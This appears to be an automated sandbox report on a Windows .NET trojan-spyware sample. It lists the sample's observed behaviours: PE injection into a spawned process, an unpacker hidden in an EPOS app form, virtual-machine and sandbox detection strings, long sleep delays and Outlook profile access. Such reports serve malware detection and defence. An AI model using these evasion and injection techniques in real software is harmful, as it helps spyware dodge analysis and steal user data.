Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWise.dll6 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000000.00000002.308322614.0000000007560000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000000.00000002.299828968.0000000003D99000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCollins.dll8 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000002.00000002.518621296.00000000008F9000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe, 00000002.00000000.280006531.0000000000438000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamec6543d50-f152-4327-a2fd-262f3848f5e8.exe4 vs rzN2ckYW24.exe
Source: rzN2ckYW24.exe	Binary or memory string: OriginalFilenameVAZlQ.exe, vs rzN2ckYW24.exe

Source: rzN2ckYW24.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: rzN2ckYW24.exe	Virustotal: Detection: 30%
Source: rzN2ckYW24.exe	ReversingLabs: Detection: 31%

Source: rzN2ckYW24.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe	Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rzN2ckYW24.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

File created: C:\Users\user\AppData\Local\Temp\tmp4B06.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/1@3/2

Source: rzN2ckYW24.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 2.0.rzN2ckYW24.exe.400000.0.unpack, A/f2.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: rzN2ckYW24.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: rzN2ckYW24.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: rzN2ckYW24.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

.NET source code contains potential unpacker

Source: rzN2ckYW24.exe, BeerPalaceEPOSApp/MainMenuForm.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.rzN2ckYW24.exe.9c0000.0.unpack, BeerPalaceEPOSApp/MainMenuForm.cs	.Net Code: .ctor System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_075F5959 push ecx; ret		0_2_075F595A
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Code function: 0_2_077C3DFF pushad ; ret		0_2_077C3E06

Source: rzN2ckYW24.exe

Static PE information: 0xBEFF304D [Fri Jul 17 21:44:45 2071 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 7.934508263967678

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0.2.rzN2ckYW24.exe.2cd4898.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.2cf7984.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.rzN2ckYW24.exe.2d587f0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rzN2ckYW24.exe PID: 3044, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: rzN2ckYW24.exe, 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: rzN2ckYW24.exe, 00000000.00000002.294910636.0000000002D57000.00000004.00000800.00020000.00000000.sdmp, rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 2336	Thread sleep time: -42186s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5096	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5852	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5852	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe TID: 5092	Thread sleep count: 9836 > 30	Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Window / User API: threadDelayed 9836

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Thread delayed: delay time: 42186	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: rzN2ckYW24.exe, 00000002.00000003.326404699.0000000000C17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllt
Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: rzN2ckYW24.exe, 00000000.00000002.293830899.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\rzN2ckYW24.exe

Memory written: C:\Users\user\Desktop\rzN2ckYW24.exe base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe			Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Process created: C:\Users\user\Desktop\rzN2ckYW24.exe C:\Users\user\Desktop\rzN2ckYW24.exe			Jump to behavior

Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Users\user\Desktop\rzN2ckYW24.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rzN2ckYW24.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
